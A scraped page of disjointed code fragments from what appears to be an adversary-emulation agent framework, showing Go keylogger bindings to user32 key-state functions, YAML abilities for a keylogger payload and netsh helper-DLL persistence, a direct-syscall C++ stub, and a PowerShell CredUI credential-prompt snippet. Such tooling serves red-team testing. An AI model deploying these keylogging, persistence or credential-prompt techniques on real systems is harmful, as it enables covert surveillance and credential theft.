This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package commands | |
import ( | |
"encoding/json" | |
"log" | |
"os" | |
"syscall" | |
"unsafe" | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//+build !windows | |
package commands | |
func CallNativeAPI(task string) (string, int, int) { | |
return "Not implemented for non-Windows platforms", 1, -1 | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if executor == "keyword" { | |
task := splitMessage(message, '.') | |
if task[0] == "api" { | |
return CallNativeAPI(task[1]) | |
} else if task[0] == "config" { | |
return updateConfiguration(task[1], agent) | |
} | |
return "Keyword selected not available for agent", 0, 0 | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if executor == "keyword" { | |
task := splitMessage(message, '.') | |
if task[0] == "module" { | |
var err error | |
if !contains(util.InstalledModuleKeywords, task[1] + "." + task[2]) { | |
err = util.InstallModule(task[1], payloadPath) | |
} | |
if err != nil { | |
return err.Error(), 1, -1 | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
platforms: | |
windows: | |
keyword: | |
command: module.collect.keyLogger | |
payload: "#{operator.payloads}/pneumaEX/collect/collect-windows.exe" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var ( | |
user32 = syscall.NewLazyDLL("user32.dll") | |
getAsyncKeyState = user32.NewProc("GetAsyncKeyState") | |
getKeyboardLayout = user32.NewProc("GetKeyboardLayout") | |
getKeyState = user32.NewProc("GetKeyState") | |
toUnicodeEx = user32.NewProc("ToUnicodeEx") | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
platforms: | |
windows: | |
exec: | |
command: 'netsh.exe add helper #{agent.location}\..\netShHelperDll.dll' | |
payload: '#{operator.payloads}/persistence/netsh/netShHelperDll.dll' | |
cmd: | |
command: 'netsh.exe add helper #{agent.location}\..\netShHelperDll.dll' | |
payload: '#{operator.payloads}/persistence/netsh/netShHelperDll.dll' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <locale> | |
#include <cstdlib> | |
#include <stdio.h> | |
#include <string> | |
#include <Windows.h> | |
#include "Syscalls.h" | |
LONG GetStringRegKey(HKEY, const std::wstring&, std::wstring&, const std::wstring&); | |
DWORD WINAPI RunBin(LPVOID lpParameter) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$type=@" | |
using System; | |
using System.Text; | |
using System.Runtime.InteropServices; | |
public static class CredUI | |
{ | |
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] | |
private struct CREDUI_INFO |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RunStandalone("GoCapture", "C:\File\Path\To\Capture\into.tmp") |